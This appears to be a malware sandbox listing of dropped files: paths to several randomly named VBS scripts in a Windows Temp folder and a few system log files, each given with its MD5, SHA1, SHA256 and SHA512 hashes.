C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a6bad9528f8e23fb5c77fbd81fa28e8
SHA1 f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

C:\Users\Admin\AppData\Local\Temp\ab7e06f9-2cc8-4039-a499-49e52af85ad2.vbs

MD5 0ed4f3a9a6b10c4f85784d37a2bc67a7
SHA1 3ec384dc0bcb02992cc08cf1e954e8368e5c310a
SHA256 2c60ca22b4a11a9cc66974e26c118db4f4d3f1b0ff6cbe105d18f37ece1fdc03
SHA512 24d073ab3a6aa04849576132893d1edf3993f859016e7a2f2799182c3886c3307b2fb027079b5356f97b21e60ad8de0cd99044fcec2b0c85bd3188daf6366558

C:\Users\Admin\AppData\Local\Temp\eda212e0-b707-4135-b3ca-d394da60635d.vbs

MD5 fca860c1322f605db549053e7f9f8eb2
SHA1 ca1f6b73c44bffb2e1850011f6e17b1ea79365d1
SHA256 cc5005df06a46cb34012e5e3f100e9019ca6006007b1939e5b969a75413a5107
SHA512 3184e3eb2ffcc8a5acdc7bff847c8ec041bbd1be69753ccdb55ec7a292371625d97ef29b6f6e969f452239e59088cd421e994482090b2818b3c179b1ac683106

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dwm.exe.log

MD5 49b64127208271d8f797256057d0b006
SHA1 b99bd7e2b4e9ed24de47fb3341ea67660b84cca1
SHA256 2a5d403a2e649d8eceef8f785eeb0f6d33888ec6bbf251b3c347e34cb32b1e77
SHA512 f7c728923c893dc9bc88ad2159e0abcda41e1b40ff7e7756e6252d135ed238a2248a2662b3392449836dd1b0b580f0c866cc33e409527484fe4602e3d3f10e3e

C:\Users\Admin\AppData\Local\Temp\81c5646d-102c-46e0-92fd-129b90595df8.vbs

MD5 58ff086d9185ed49d907dfa2329c7e53
SHA1 cb96a0f2b0e64f809ee2280693bfae97951eb9da
SHA256 27a499a98412e23bd5af60a23f811345624f1792260cea6d52396c3fbde5e445
SHA512 557e64d84945932a8bcf66b987a85860dea266530a3f4ea47fa1138a63398d28ed4b2c93c6fc5242ce6aa6d7c8419d24f64de7a9186b6e231b33dbf7f609829b

C:\Users\Admin\AppData\Local\Temp\e6fc0a39-883a-46ff-a6d3-d13ba2e70843.vbs

MD5 c2b953e70b591e02c4a3c23152d20549
SHA1 34cc29faccb0afd53aeebe09a04505c25a93848a
SHA256 0b641dbc5cad5a9a30f32184468c76cfd245091fbe40007eed29d5813083cdd6
SHA512 84364453dc77f2f333491f59fb424b12bdb73603c5cf05c9e772ea1128dad3f72c6baf8a441208652be66f7419538c0c1ea678d81ee8557bed9aea04ed006e33

C:\Users\Admin\AppData\Local\Temp\b745de3f-71bb-43d1-b5ee-dbf9a731a082.vbs

MD5 9aef344306ee1207ba6a76cf00c8118d
SHA1 0f49cbe52a8c6b04f70b50d0d9916069cc9f04e1
SHA256 638758f4c84b3b1a273f7a90ca0d783d4a6c342ba7bbcf48e910b845757dd4ab
SHA512 fff981c1dd7b50ca52726971a8fe507b50acec7979f74ff6ccef18905d0fdb4bd4cd464c1c0691770c536d2fcbea230476fe96fd56be00c60bf4cea987d7deee

C:\Users\Admin\AppData\Local\Temp\963ae9cf-215a-4c39-9f8a-a4cbef438161.vbs

MD5 c3ef35037db52b01840dc65f1f38b852
SHA1 dc1a6e69aa1f86bb382be023f87cfbbf59a77f6f
SHA256 fd24fba1f2bc5cd470366e2bdd82aee1fe142c06f58a00ed225ecaa2a61a60e0
SHA512 d319440cd8f96b6e2b34a2472bcb931da38190ceeadbeb4f67d7f1a128e3035bc72db4ae9e4483d247d6974b6b9beb20f5c416e469c74845ba4899344f177098

C:\Users\Admin\AppData\Local\Temp\b32fa960-2f85-4070-ba3e-49aa4a739b40.vbs

MD5 da22ef041ddd10f6a1eb192fe043f6d6
SHA1 e2a545963ddacd4110aca18baf8ee7809e11a5c2
SHA256 1e1e760b96b1ae647201282d6da5acc90d86e178608fb5f50b4f3120bc390d5f
SHA512 ca34ec316621c7ef93b763e47590f017ba006c488d32a34b61b6d547c3bf723a6352bca4eb81f040461528e74e55e960e04aebe96291a1b36c8be64303298d54

C:\Users\Admin\AppData\Local\Temp\91ca450c-7cd1-4794-aa05-82bfcf12046a.vbs

MD5 91eea95cbd4125a4ea37ca783dfaba38
SHA1 1187f86cde141001c90ef65e8825f3b1290ba2c2
SHA256 f3d30d622c637e2985867991769586f04ed3ad5fa654787c472386e0ee0d9aff
SHA512 ffd55a8489efbe2e421b5aac6effa8e0c0657651cdf836a1a76f5f7dd158588c23adb7de14abbe56938a9cbc9f6763e75362236faf7288b4d1147efb4be6ce1d